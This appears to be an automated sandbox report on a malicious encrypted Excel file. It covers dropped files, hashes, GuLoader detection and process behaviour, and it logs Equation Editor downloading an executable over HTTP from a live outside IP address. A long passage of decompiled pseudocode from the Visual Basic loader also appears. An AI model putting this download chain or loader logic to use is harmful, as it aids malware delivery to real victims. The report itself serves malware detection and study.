      Preview: .PNG........IHDR.............'P......gAMA......a.....sRGB.........pHYs..........o.d....PLTE...............LLL.....................................................................ppp......`.6................?.6.._...`Bi...Y..f...%E........_...5DG....._.tNq.8.6..<?.....5...PVj..X.1...4U..._z..ANTT.b...kt..zZ5...........__..........~.......ff`.........H#....DIDATx..[.[....R..lK.|....E*........P.....sz...3..I...X#.....ffwv...n...~:.X...E}......\`}.g..>.3.X........r!.`.:..B8\.f0f....lx4..7s.o....F.&..\............s!\........o.....Ssa....1.X.<9."sso...G.\XX..q.2.....D@.0...".'.'/0.......K.px......X.....`......iD..c.-.....J//.o.,....<......9m). ..R...@'..q.y....N..&$...v94.q..<.w.\.P......f_.... ...B.0}o.....y......l.Z..PzRb..F.....[..)..........J,....B....t(..BR...w .Q...S...H...{.....7P........o...Ol..fV.\.........}.......A'.g.:E.7.u.........|.5pDj..f0.E:n..'. .....E..j^..tp\H;....3...C\..u.e..P.{...6.9....".6M....K..".F.D.a0.....|>.T...x.Yj....C".
      C:\Users\user\Desktop\~$DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):330
      Entropy (8bit):1.4377382811115937
      Encrypted:false
      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
      MD5:96114D75E30EBD26B572C1FC83D1D02E
      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
      Malicious:true
      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      C:\Users\Public\vbc.exe
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):259192
      Entropy (8bit):4.6012516392465255
      Encrypted:false
      SSDEEP:1536:2blgLWMXncWYqmOeDA6W6h8eaBWTvYeigJ2cI6wt:NLWMXntzVAA6W6GwZJgt
      MD5:9318CD06A9A0B788DC043A63C97D4FCE
      SHA1:A296EA3E1CF6D41F9D059D7D6E5058882B03161A
      SHA-256:7AD18B09938D40E8EC342EE6BEE6B190A986FFEDCE7567A638B8D25B4098CB69
      SHA-512:DA057BF10D5A7AE8863DD0310B3D4116AF6535AACC68074C9C301E79F580860C2CECBA991628D274D62E029EE210F92705C12125DC390072556CA031A16CD4B3
      Malicious:true
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....zY.................@...................P....@.................................eR......................................$F..(....`...p..........X... ...................................................(... ....................................text...d:.......@.................. ..`.data........P.......P..............@....rsrc....p...`.......`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:CDFV2 Encrypted
      Entropy (8bit):7.994383691720442
      TrID:
      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
      File name:DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx
      File size:1163264
      MD5:ab57abd998267541ce6d27ecf2b85ba5
      SHA1:4840478268380cf80e55d5ca019d108236d100a6
      SHA256:6af62a337c410357a5f49294e98ead83092c6a1d3b73e58c2f56ea5abfdd745e
      SHA512:3aab6a08a924bb2453fa3b67ad5a252f0e855a97d90f9e51612aa87d62ecfcb1721ee6cc23a7be8616e72759ba966e82cdf8e25457bfd005502c3d4aeba9bb0d
      SSDEEP:24576:4euFjaC6WRHUXZ1oTCc6RX4+AogtnEHj2cwEcX1/68kyuMHFnoRoPE:4evC7RHUXZpc6AoCEDtRc168zlnHE
      File Content Preview:........................>...............................................................................................z.......|.......~......................................................................................................................

      File Icon

      Icon Hash:e4e2aa8aa4b4bcb4

      Network Behavior

      Network Port Distribution

      TCP Packets

      Timestamp                              Source Port   Dest Port   Source IP       Dest IP
      Aug 2, 2021 07:25:40.828036070 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.093410015 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.093476057 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.093498945 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.093523979 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.093554020 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.093580961 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.093604088 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.093628883 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.093677044 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.093707085 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.099354029 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.099392891 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.099411964 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.099436045 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.099457026 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.099477053 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.099497080 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.099646091 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.099667072 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.100224018 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.100249052 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.100270033 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.100296974 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.100333929 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.100368023 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.100393057 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.100414038 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.100440025 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.100466013 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.100486994 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.100511074 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.100557089 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.100574970 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.100580931 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.100584030 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.100586891 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.100589037 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.100590944 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.100593090 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.101625919 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.107306004 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.107373953 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.107434988 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.107450962 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.107541084 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.107611895 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.107619047 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.107686043 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.107734919 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.107789993 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.107796907 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.107846975 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.107853889 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.107912064 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.107913017 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.107966900 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.107971907 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.108021021 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.108022928 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.108079910 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.108129978 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.108185053 CEST8049167180.214.239.39192.168.2.22
      Aug 2, 2021 07:25:41.108186960 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.108241081 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.109390974 CEST4916780192.168.2.22180.214.239.39
      Aug 2, 2021 07:25:41.635222912 CEST4916780192.168.2.22180.214.239.39

      HTTP Request Dependency Graph

      • 180.214.239.39

      HTTP Packets

      Session ID | Source IP    | Source Port | Destination IP | Destination Port | Process
      0          | 192.168.2.22 | 49167       | 180.214.239.39 | 80               | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Timestamp | kBytes transferred | Direction | Data
      Aug 2, 2021 07:25:39.066087961 CEST | 0 | OUT | GET /msexcel/.svchost.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 180.214.239.39
      Connection: Keep-Alive
      Aug 2, 2021 07:25:39.361825943 CEST | 1 | IN | HTTP/1.1 200 OK
      Date: Mon, 02 Aug 2021 05:13:25 GMT
      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
      Last-Modified: Sun, 01 Aug 2021 20:24:21 GMT
      ETag: "3f478-5c8853ce1d903"
      Accept-Ranges: bytes
      Content-Length: 259192
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-msdownload


      Code Manipulations

      Statistics

      CPU Usage

      Memory Usage

      High Level Behavior Distribution

      Behavior

      System Behavior

      General

      Start time: 07:24:41
      Start date: 02/08/2021
      Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit): false
      Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase: 0x13fc90000
      File size: 27641504 bytes
      MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
      Has elevated privileges: true
      Has administrator privileges: true
      Programmed in: C, C++ or other language
      Reputation: high

      General

      Start time: 07:25:03
      Start date: 02/08/2021
      Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit): true
      Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Imagebase: 0x400000
      File size: 543304 bytes
      MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges: true
      Has administrator privileges: true
      Programmed in: C, C++ or other language
      Reputation: high

      General

      Start time: 07:25:06
      Start date: 02/08/2021
      Path: C:\Users\Public\vbc.exe
      Wow64 process (32bit): true
      Commandline: 'C:\Users\Public\vbc.exe'
      Imagebase: 0x400000
      File size: 259192 bytes
      MD5 hash: 9318CD06A9A0B788DC043A63C97D4FCE
      Has elevated privileges: true
      Has administrator privileges: true
      Programmed in: Visual Basic
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
      Reputation: low

      Disassembly

      Code Analysis


        Executed Functions

        APIs
        • NtAllocateVirtualMemory.NTDLL(-C11FD922), ref: 0027594C
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID: AllocateMemoryVirtual
        • String ID: 7qKI$J_($Rn/$Rn/$^Zi$_K$d@0!$n?SK$*G$JK
        • API String ID: 2167126740-1855165314
        • Opcode ID: 77fdd16bc28cb0b8fdf8081dcadd2b4230c21fa3925e99c39555f48ee8f10892
        • Instruction ID: 083b1f51655c080ae54ff36bf6e6ca352b6b8b7eb9bf823e81854003846db164
        • Opcode Fuzzy Hash: 77fdd16bc28cb0b8fdf8081dcadd2b4230c21fa3925e99c39555f48ee8f10892
        • Instruction Fuzzy Hash: 3D8252B260034A9FEB349E78CD947DA77A2FF59350F94812EDC8D9B240D7748A85CB42
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 52%
        			E004331B4(signed int _a4, intOrPtr _a682) {
        				signed int _v8;
        				intOrPtr _v12;
        				long long* _v16;
        				void* _v44;
        				void* _v56;
        				char _v60;
        				char _v64;
        				char _v88;
        				char _v100;
        				char _v104;
        				char _v108;
        				char _v112;
        				void* _v116;
        				char _v120;
        				intOrPtr _v128;
        				char _v136;
        				intOrPtr _v144;
        				char _v152;
        				intOrPtr _v160;
        				char _v168;
        				intOrPtr _v176;
        				char _v184;
        				char _v200;
        				char _v232;
        				char _v252;
        				char _v256;
        				char _v260;
        				char _v264;
        				char _v268;
        				char _v272;
        				char _v276;
        				char _v280;
        				char _v284;
        				void* _t165;
        				intOrPtr* _t166;
        				void* _t167;
        				void* _t169;
        				intOrPtr* _t170;
        				signed int _t171;
        				void* _t177;
        				void* _t179;
        				void* _t181;
        				void* _t183;
        				void* _t185;
        				void* _t187;
        				void* _t189;
        				void* _t191;
        				void* _t193;
        				void* _t195;
        				void* _t197;
        				void* _t199;
        				void* _t201;
        				void* _t203;
        				void* _t205;
        				char _t206;
        				void* _t212;
        				signed int _t213;
        				signed int _t214;
        				char* _t241;
        				char* _t259;
        				void* _t282;
        				char _t285;
        				void* _t289;
        				intOrPtr* _t290;
        				intOrPtr* _t291;
        				intOrPtr* _t292;
        				intOrPtr* _t293;
        				void* _t298;
        				intOrPtr _t300;
        				long long* _t301;
        				void* _t302;
        				void* _t305;
        
        				 *[fs:0x0] = _t300;
        				_t301 = _t300 - 0x12c;
        				_v16 = _t301;
        				_v12 = 0x401130;
        				_t213 = _a4;
        				_v8 = _t213 & 0x00000001;
        				_t214 = _t213 & 0xfffffffe;
        				_a4 = _t214;
        				 *((intOrPtr*)( *_t214 + 4))(_t214, _t282, _t289, _t212,  *[fs:0x0], 0x401226);
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				_t285 = 0;
        				_t302 =  *0x435448 - _t285; // 0x24f6f4
        				_v60 = 0;
        				_v64 = 0;
        				_v88 = 0;
        				_v100 = 0;
        				_v104 = 0;
        				_v108 = 0;
        				_v112 = 0;
        				_v116 = 0;
        				_v120 = 0;
        				_v136 = 0;
        				_v152 = 0;
        				_v168 = 0;
        				_v184 = 0;
        				_v200 = 0;
        				_v232 = 0;
        				_v252 = 0;
        				_v256 = 0;
        				_v260 = 0;
        				_v264 = 0;
        				_v268 = 0;
        				_v272 = 0;
        				_v276 = 0;
        				_v284 = 0;
        				_v280 = 0;
        				if(_t302 == 0) {
        					_push(0x435448);
        					_push(0x431ad4);
        					L00401364();
        				}
        				_t290 =  *0x435448; // 0x24f6f4
        				_t165 =  *((intOrPtr*)( *_t290 + 0x14))(_t290,  &_v116);
        				asm("fclex");
        				if(_t165 < _t285) {
        					_push(0x14);
        					_push(0x431ac4);
        					_push(_t290);
        					_push(_t165);
        					L0040135E();
        				}
        				_t166 = _v116;
        				_t291 = _t166;
        				_t167 =  *((intOrPtr*)( *_t166 + 0x110))(_t166,  &_v108);
        				asm("fclex");
        				if(_t167 < _t285) {
        					_push(0x110);
        					_push(0x431ae4);
        					_push(_t291);
        					_push(_t167);
        					L0040135E();
        				}
        				_v108 = _t285;
        				L0040136A();
        				L00401358();
        				_t305 =  *0x435448 - _t285; // 0x24f6f4
        				if(_t305 == 0) {
        					_push(0x435448);
        					_push(0x431ad4);
        					L00401364();
        				}
        				_t292 =  *0x435448; // 0x24f6f4
        				_t169 =  *((intOrPtr*)( *_t292 + 0x14))(_t292,  &_v116);
        				asm("fclex");
        				if(_t169 < _t285) {
        					_push(0x14);
        					_push(0x431ac4);
        					_push(_t292);
        					_push(_t169);
        					L0040135E();
        				}
        				_t170 = _v116;
        				_t293 = _t170;
        				_t171 =  *((intOrPtr*)( *_t170 + 0x50))(_t170,  &_v108);
        				asm("fclex");
        				if(_t171 < _t285) {
        					_push(0x50);
        					_push(0x431ae4);
        					_push(_t293);
        					_push(_t171);
        					L0040135E();
        				}
        				_push(_v108);
        				_push(_t285);
        				L00401352();
        				asm("sbb esi, esi");
        				L0040134C();
        				L00401358();
        				if( ~( ~_t171 + 1) != _t285) {
        					_push(_t285);
        					_push(L"Gennemfoerer7");
        					_push( &_v136);
        					L00401340();
        					_t301 = _t301 - 0x10;
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_push(0);
        					_push(_v100);
        					asm("movsd");
        					L00401346();
        					L0040133A();
        					_t285 = 0;
        				}
        				_v252 = 0x18e0;
        				 *((intOrPtr*)( *_t214 + 0x718))(_t214,  &_v252, L"Manitou5");
        				_v252 = 0x2f68;
        				 *((intOrPtr*)( *_t214 + 0x718))(_t214,  &_v252, L"LUTES");
        				L00401334();
        				_t177 =  *((intOrPtr*)( *_t214 + 0x700))(_t214,  &_v108, 0x549086);
        				if(_t177 >= _t285) {
        					_t298 = 0x431650;
        				} else {
        					_push(0x700);
        					_t298 = 0x431650;
        					_push(0x431650);
        					_push(_t214);
        					_push(_t177);
        					L0040135E();
        				}
        				L0040134C();
        				_v272 = 0x4c51a4;
        				_v268 = 0x4b3f310a;
        				L00401334();
        				_t69 =  &_v268; // 0x4b3f310a
        				_t179 =  *((intOrPtr*)( *_t214 + 0x6f8))(_t214,  &_v108, _t69, 0x1a6e,  &_v272,  &_v276);
        				if(_t179 < 0) {
        					_push(0x6f8);
        					_push(_t298);
        					_push(_t214);
        					_push(_t179);
        					L0040135E();
        				}
        				L0040134C();
        				_v260 = 0x20fb;
        				_v256 = 0x22c0;
        				_v252 = 0xad1;
        				_t181 =  *((intOrPtr*)( *_t214 + 0x704))(_t214, 0x5fc0,  &_v252,  &_v256, 0x5e3c7650, 0x5af8,  &_v260,  &_v264);
        				if(_t181 < 0) {
        					_push(0x704);
        					_push(_t298);
        					_push(_t214);
        					_push(_t181);
        					L0040135E();
        				}
        				_t81 =  &_v268; // 0x4b3f310a
        				_v252 = 0x7005;
        				_t183 =  *((intOrPtr*)( *_t214 + 0x6fc))(_t214, 0x72750c,  &_v252, L"eskalere", _t81);
        				if(_t183 < 0) {
        					_push(0x6fc);
        					_push(_t298);
        					_push(_t214);
        					_push(_t183);
        					L0040135E();
        				}
        				_t85 =  &_v268; // 0x4b3f310a
        				_t241 =  &_v252;
        				_v252 = 0x1c28;
        				_t185 =  *((intOrPtr*)( *_t214 + 0x6fc))(_t214, 0x21c7b1, _t241, L"Ombudsmandssags", _t85);
        				if(_t185 < 0) {
        					_push(0x6fc);
        					_push(_t298);
        					_push(_t214);
        					_push(_t185);
        					L0040135E();
        				}
        				 *_t301 =  *0x401128;
        				_v284 = 0x98f265f0;
        				_v280 = 0x5af5;
        				_t187 =  *((intOrPtr*)( *_t214 + 0x710))(_t214, L"Foretagende",  &_v284, 0x38813, _t241, _t241);
        				if(_t187 < 0) {
        					_push(0x710);
        					_push(_t298);
        					_push(_t214);
        					_push(_t187);
        					L0040135E();
        				}
        				L00401334();
        				_t189 =  *((intOrPtr*)( *_t214 + 0x700))(_t214,  &_v108, 0x102d81);
        				if(_t189 < 0) {
        					_push(0x700);
        					_push(_t298);
        					_push(_t214);
        					_push(_t189);
        					L0040135E();
        				}
        				L0040134C();
        				_v260 = 0x1896;
        				_v256 = 0x71bf;
        				_v252 = 0x63df;
        				_t191 =  *((intOrPtr*)( *_t214 + 0x704))(_t214, 0x6a8a,  &_v252,  &_v256, 0x694ff200, 0x5afe,  &_v260,  &_v264);
        				if(_t191 < 0) {
        					_push(0x704);
        					_push(_t298);
        					_push(_t214);
        					_push(_t191);
        					L0040135E();
        				}
        				L00401334();
        				_t193 =  *((intOrPtr*)( *_t214 + 0x700))(_t214,  &_v108, 0x24b6b9);
        				if(_t193 < 0) {
        					_push(0x700);
        					_push(_t298);
        					_push(_t214);
        					_push(_t193);
        					L0040135E();
        				}
        				L0040134C();
        				L00401334();
        				_t195 =  *((intOrPtr*)( *_t214 + 0x700))(_t214,  &_v108, 0x6a9141);
        				if(_t195 < 0) {
        					_push(0x700);
        					_push(_t298);
        					_push(_t214);
        					_push(_t195);
        					L0040135E();
        				}
        				L0040134C();
        				_t259 =  &_v252;
        				_v260 = 0x3004;
        				_v256 = 0x1b53;
        				_v252 = 0x13cb;
        				_t197 =  *((intOrPtr*)( *_t214 + 0x704))(_t214, 0x35f8, _t259,  &_v256, 0xcd9869a0, 0x5b02,  &_v260,  &_v264);
        				if(_t197 < 0) {
        					_push(0x704);
        					_push(_t298);
        					_push(_t214);
        					_push(_t197);
        					L0040135E();
        				}
        				 *_t301 =  *0x401120;
        				_v284 = 0xbed390a0;
        				_v280 = 0x5afa;
        				_t199 =  *((intOrPtr*)( *_t214 + 0x710))(_t214, L"Decametre",  &_v284, 0x31010f, _t259, _t259);
        				if(_t199 < 0) {
        					_push(0x710);
        					_push(_t298);
        					_push(_t214);
        					_push(_t199);
        					L0040135E();
        				}
        				_v272 = 0x417ed2;
        				_v268 = 0x4b821121;
        				L00401334();
        				_t201 =  *((intOrPtr*)( *_t214 + 0x6f8))(_t214,  &_v108,  &_v268, 0x3a32,  &_v272,  &_v276);
        				if(_t201 < 0) {
        					_push(0x6f8);
        					_push(_t298);
        					_push(_t214);
        					_push(_t201);
        					L0040135E();
        				}
        				L0040134C();
        				_v252 = 0x5041;
        				_t203 =  *((intOrPtr*)( *_t214 + 0x6fc))(_t214, 0x186c63,  &_v252, L"SIBNESS",  &_v268);
        				if(_t203 < 0) {
        					_push(0x6fc);
        					_push(_t298);
        					_push(_t214);
        					_push(_t203);
        					L0040135E();
        				}
        				_v252 = 0x6b03;
        				_t205 =  *((intOrPtr*)( *_t214 + 0x6fc))(_t214, 0x840f3b,  &_v252, L"MASCHA",  &_v268);
        				if(_t205 < 0) {
        					_push(0x6fc);
        					_push(_t298);
        					_push(_t214);
        					_push(_t205);
        					L0040135E();
        				}
        				_t206 = 0xa;
        				_v184 = _t206;
        				_v168 = _t206;
        				_v152 = _t206;
        				_push( &_v184);
        				_push( &_v168);
        				_push( &_v152);
        				_push(0);
        				_push( &_v136);
        				_v176 = 0x80020004;
        				_v160 = 0x80020004;
        				_v144 = 0x80020004;
        				_v128 = 0xa776766;
        				_a682 = 0x40df24;
        				_a682 = _a682 - 0xfffe49fa;
        				goto __edi;
        			}

        0x00433764
        0x00433764
        0x00433771
        0x0043377b
        0x00433785
        0x004337ab
        0x004337b3
        0x004337b5
        0x004337ba
        0x004337bb
        0x004337bc
        0x004337bd
        0x004337bd
        0x004337c5
        0x004337e5
        0x004337ef
        0x004337f7
        0x004337f9
        0x004337fe
        0x004337ff
        0x00433800
        0x00433801
        0x00433801
        0x00433821
        0x0043382b
        0x00433833
        0x00433835
        0x0043383a
        0x0043383b
        0x0043383c
        0x0043383d
        0x0043383d
        0x00433844
        0x00433845
        0x0043384b
        0x00433851
        0x0043385d
        0x00433864
        0x0043386b
        0x00433871
        0x00433879
        0x0043387a
        0x00433880
        0x00433886
        0x0043388c
        0x00433893
        0x0043389d
        0x004338ad

        APIs
        • __vbaNew2.MSVBVM60(00431AD4,00435448), ref: 0043328F
        • __vbaHresultCheckObj.MSVBVM60(00000000,0024F6F4,00431AC4,00000014), ref: 004332B3
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00431AE4,00000110), ref: 004332DC
        • __vbaStrMove.MSVBVM60(00000000,?,00431AE4,00000110), ref: 004332EA
        • __vbaFreeObj.MSVBVM60(00000000,?,00431AE4,00000110), ref: 004332F2
        • __vbaNew2.MSVBVM60(00431AD4,00435448), ref: 00433309
        • __vbaHresultCheckObj.MSVBVM60(00000000,0024F6F4,00431AC4,00000014), ref: 0043332D
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00431AE4,00000050), ref: 00433350
        • __vbaStrCmp.MSVBVM60(00000000,?), ref: 00433359
        • __vbaFreeStr.MSVBVM60(00000000,?), ref: 0043336A
        • __vbaFreeObj.MSVBVM60(00000000,?), ref: 00433372
        • #716.MSVBVM60(?,Gennemfoerer7,00000000,00000000,?), ref: 00433389
        • __vbaLateIdSt.MSVBVM60(?,00000000,?), ref: 004333A2
        • __vbaFreeVar.MSVBVM60(?,00000000,?), ref: 004333AD
        • __vbaStrCopy.MSVBVM60 ref: 004333FA
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000700), ref: 00433423
        • __vbaFreeStr.MSVBVM60(00000000,00401130,00431650,00000700), ref: 00433432
        • __vbaStrCopy.MSVBVM60(00000000,00401130,00431650,00000700), ref: 00433453
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,000006F8), ref: 0043348B
        • __vbaFreeStr.MSVBVM60(00000000,00401130,00431650,000006F8), ref: 00433493
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000704), ref: 004334F6
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,000006FC), ref: 00433532
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,000006FC), ref: 0043356E
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000710), ref: 004335B8
        • __vbaStrCopy.MSVBVM60(00000000,00401130,00431650,00000710), ref: 004335C5
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000700), ref: 004335E4
        • __vbaFreeStr.MSVBVM60(00000000,00401130,00431650,00000700), ref: 004335EC
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000704), ref: 0043364F
        • __vbaStrCopy.MSVBVM60(00000000,00401130,00431650,00000704), ref: 0043365C
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000700), ref: 0043367B
        • __vbaFreeStr.MSVBVM60(00000000,00401130,00431650,00000700), ref: 00433683
        • __vbaStrCopy.MSVBVM60(00000000,00401130,00431650,00000700), ref: 00433690
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000700), ref: 004336AF
        • __vbaFreeStr.MSVBVM60(00000000,00401130,00431650,00000700), ref: 004336B7
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000704), ref: 0043371A
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000710), ref: 00433764
        • __vbaStrCopy.MSVBVM60(00000000,00401130,00431650,00000710), ref: 00433785
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,000006F8), ref: 004337BD
        • __vbaFreeStr.MSVBVM60(00000000,00401130,00431650,000006F8), ref: 004337C5
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,000006FC), ref: 00433801
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,000006FC), ref: 0043383D
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355935745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2355931397.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000006.00000002.2355957257.0000000000435000.00000004.00020000.sdmp
        • Associated: 00000006.00000002.2355962315.0000000000436000.00000002.00020000.sdmp
        Similarity
        • API ID: __vba$CheckHresult$Free$Copy$New2$#716LateMove
        • String ID: 1?K$AP$Baghaven$Decametre$Foretagende$Gennemfoerer7$LUTES$MASCHA$Manitou5$Ombudsmandssags$Racquets6$SIBNESS$Undertip8$dovneste$eskalere$fgw$forktrelser$spermaceti
        • API String ID: 3859083423-3706718144
        • Opcode ID: f5e45a99b951f2a1d1be3cf14854c28194beabfd59fc8e0f6390fd9e00acbb44
        • Instruction ID: 0cb2dea461580c366750edc0f6d7fd51c3546b181de6eaf3d35cf75ba8531b1f
        • Opcode Fuzzy Hash: f5e45a99b951f2a1d1be3cf14854c28194beabfd59fc8e0f6390fd9e00acbb44
        • Instruction Fuzzy Hash: D61241B0940219AFEB24DF55CC89FEEB7B8EF14704F0041AAF509A7191DBB85A84CF64
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        Strings
        Memory Dump Source
